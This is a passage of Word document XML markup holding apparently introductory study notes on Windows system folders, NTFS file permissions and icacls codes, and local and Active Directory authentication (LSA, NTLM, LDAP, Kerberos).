      <w:r w:rsidRPr="0084205E">
        <w:t>PerfLogs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – stores the system issues and other reports regarding performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13582420" w14:textId="036D74A2" w:rsidR="00461F6A" w:rsidRPr="0084205E" w:rsidRDefault="00461F6A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Program Files </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B6E65D" w14:textId="1AC8ED2B" w:rsidR="00461F6A" w:rsidRPr="0084205E" w:rsidRDefault="00461F6A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Program Files (x86)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293F3F86" w14:textId="6ECB6EB5" w:rsidR="00461F6A" w:rsidRPr="0084205E" w:rsidRDefault="00461F6A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Users – stores user generated data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF3D1FE" w14:textId="634E79FC" w:rsidR="00461F6A" w:rsidRPr="0084205E" w:rsidRDefault="00461F6A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Windows – contains OS code to run system and utility tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2C6B82" w14:textId="1AFACD08" w:rsidR="00461F6A" w:rsidRPr="0084205E" w:rsidRDefault="00461F6A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Folders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22986348" w14:textId="54AAB2D5" w:rsidR="00461F6A" w:rsidRPr="0084205E" w:rsidRDefault="00461F6A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339B6807" w14:textId="720E7835" w:rsidR="00461F6A" w:rsidRPr="0084205E" w:rsidRDefault="00461F6A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>File Permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3026753A" w14:textId="4D921DE0" w:rsidR="00461F6A" w:rsidRPr="0084205E" w:rsidRDefault="00461F6A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7990EDEB" w14:textId="6858F730" w:rsidR="00461F6A" w:rsidRPr="0084205E" w:rsidRDefault="00461F6A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380FDC4E" w14:textId="0BFECA8A" w:rsidR="00461F6A" w:rsidRPr="0084205E" w:rsidRDefault="00461F6A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ACBA18" w14:textId="54BD8685" w:rsidR="00461F6A" w:rsidRPr="0084205E" w:rsidRDefault="00461F6A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Full Control</w:t>
      </w:r>
      <w:r w:rsidR="00044E62" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – set ownership of the folder, permissions for others, modify, read, write, execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42386608" w14:textId="7C6F69BC" w:rsidR="00461F6A" w:rsidRPr="0084205E" w:rsidRDefault="00461F6A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Modify</w:t>
      </w:r>
      <w:r w:rsidR="00044E62" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – modify, read, write, execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F28DD9E" w14:textId="49A2CD97" w:rsidR="00461F6A" w:rsidRPr="0084205E" w:rsidRDefault="00461F6A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Read and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Execute</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00044E62" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – read and execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1843A871" w14:textId="54DDC877" w:rsidR="00461F6A" w:rsidRPr="0084205E" w:rsidRDefault="00461F6A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>List Folders Content</w:t>
      </w:r>
      <w:r w:rsidR="00044E62" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – list the contents of a folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197D1F0F" w14:textId="7776D6C7" w:rsidR="00461F6A" w:rsidRPr="0084205E" w:rsidRDefault="00461F6A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Read</w:t>
      </w:r>
      <w:r w:rsidR="00044E62" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – only read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C0D587" w14:textId="777A0430" w:rsidR="00461F6A" w:rsidRPr="0084205E" w:rsidRDefault="00461F6A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Write</w:t>
      </w:r>
      <w:r w:rsidR="00044E62" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – write data to specified folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9F7121" w14:textId="51664A5D" w:rsidR="00461F6A" w:rsidRPr="0084205E" w:rsidRDefault="00461F6A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Special Permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3FBF8E" w14:textId="3AB446F1" w:rsidR="00044E62" w:rsidRPr="0084205E" w:rsidRDefault="00044E62" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To set permissions, select properties and go to security tab and edit, apply</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31125A4D" w14:textId="6884A7CB" w:rsidR="00044E62" w:rsidRPr="0084205E" w:rsidRDefault="00044E62" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Avoid full control permissions on folder to prevent users from setting their own permissions and taking ownership of the folder without proper authorization or privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44260CAF" w14:textId="4DF14C90" w:rsidR="00044E62" w:rsidRPr="0084205E" w:rsidRDefault="00044E62" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3D131322" w14:textId="5E633757" w:rsidR="00044E62" w:rsidRPr="0084205E" w:rsidRDefault="00044E62" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Use “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>icacls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>” – check files or folders permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4EF440" w14:textId="239DBB1B" w:rsidR="00044E62" w:rsidRPr="0084205E" w:rsidRDefault="00044E62" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>I – permission inherited from parent container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751FD0E6" w14:textId="686EF986" w:rsidR="00044E62" w:rsidRPr="0084205E" w:rsidRDefault="00044E62" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>F – full access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0467834B" w14:textId="610CDEE3" w:rsidR="00044E62" w:rsidRPr="0084205E" w:rsidRDefault="00044E62" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>M – modify rights and access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CFA712" w14:textId="6C9A765A" w:rsidR="00044E62" w:rsidRPr="0084205E" w:rsidRDefault="00044E62" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>OI – object inherit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBB49F6" w14:textId="3AC9353D" w:rsidR="00044E62" w:rsidRPr="0084205E" w:rsidRDefault="00044E62" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>IO – inherit only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540C2AD5" w14:textId="6845AD20" w:rsidR="00044E62" w:rsidRPr="0084205E" w:rsidRDefault="00044E62" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>CI – container inherit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540F8A14" w14:textId="4C3DAD1F" w:rsidR="00044E62" w:rsidRPr="0084205E" w:rsidRDefault="00044E62" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>RX – read and execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75274A76" w14:textId="400CC003" w:rsidR="00044E62" w:rsidRPr="0084205E" w:rsidRDefault="00044E62" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>AD – append data (add subdirectories)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442F0DFA" w14:textId="438C0760" w:rsidR="00044E62" w:rsidRPr="0084205E" w:rsidRDefault="00044E62" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>WD – write data and add files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E03C191" w14:textId="6332A674" w:rsidR="000931DA" w:rsidRPr="0084205E" w:rsidRDefault="000931DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Can also be used to set ownership, set, remove, or deny permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DBEBE8" w14:textId="314B1C63" w:rsidR="000931DA" w:rsidRPr="0084205E" w:rsidRDefault="000931DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Understanding the Authentication Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DDD01C" w14:textId="76F2CE0A" w:rsidR="000931DA" w:rsidRPr="0084205E" w:rsidRDefault="000931DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Local Authentication is done using the Local Security Authority (LSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD74D24" w14:textId="46ADDE8B" w:rsidR="000931DA" w:rsidRPr="0084205E" w:rsidRDefault="000931DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Protected subsystem that keeps track of the security policies and the accounts that are on a computer system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173F5324" w14:textId="31579D59" w:rsidR="000931DA" w:rsidRPr="0084205E" w:rsidRDefault="000931DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Maintains all information about all aspects of local computer security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093C1A4E" w14:textId="4A7076E6" w:rsidR="000931DA" w:rsidRPr="0084205E" w:rsidRDefault="000931DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Types of Active Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578E2A73" w14:textId="7520B519" w:rsidR="000931DA" w:rsidRPr="0084205E" w:rsidRDefault="000931DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>On-Premises AD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D07DBE" w14:textId="797DD51C" w:rsidR="000931DA" w:rsidRPr="0084205E" w:rsidRDefault="000931DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Azure AD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B658656" w14:textId="7FC352E2" w:rsidR="000931DA" w:rsidRPr="0084205E" w:rsidRDefault="000931DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Authentication for On-Premises AD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034FA011" w14:textId="3BBB7AFA" w:rsidR="000931DA" w:rsidRPr="0084205E" w:rsidRDefault="000931DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>On-Premises has record of all users, PCs, servers and authenticates with network login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2269A848" w14:textId="4101A8EC" w:rsidR="000931DA" w:rsidRPr="0084205E" w:rsidRDefault="000931DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>NTLM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BA36E1" w14:textId="64A644B1" w:rsidR="000931DA" w:rsidRPr="0084205E" w:rsidRDefault="000931DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Challenge-response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A61F3A" w14:textId="069D51EF" w:rsidR="000931DA" w:rsidRPr="0084205E" w:rsidRDefault="000931DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>No data integrity or confidentiality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19344614" w14:textId="5C5CF44C" w:rsidR="000931DA" w:rsidRPr="0084205E" w:rsidRDefault="000931DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>LDAP/LDAPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7514E378" w14:textId="2112B927" w:rsidR="000931DA" w:rsidRPr="0084205E" w:rsidRDefault="008E6E31" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>User workstation sends credentials via API to DC to validate them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B8A19E" w14:textId="6655CECE" w:rsidR="000931DA" w:rsidRPr="0084205E" w:rsidRDefault="000931DA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>KERBEROS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EB932D" w14:textId="0FA27587" w:rsidR="008E6E31" w:rsidRPr="0084205E" w:rsidRDefault="008E6E31" w:rsidP="0084205E">
      <w:pPr>
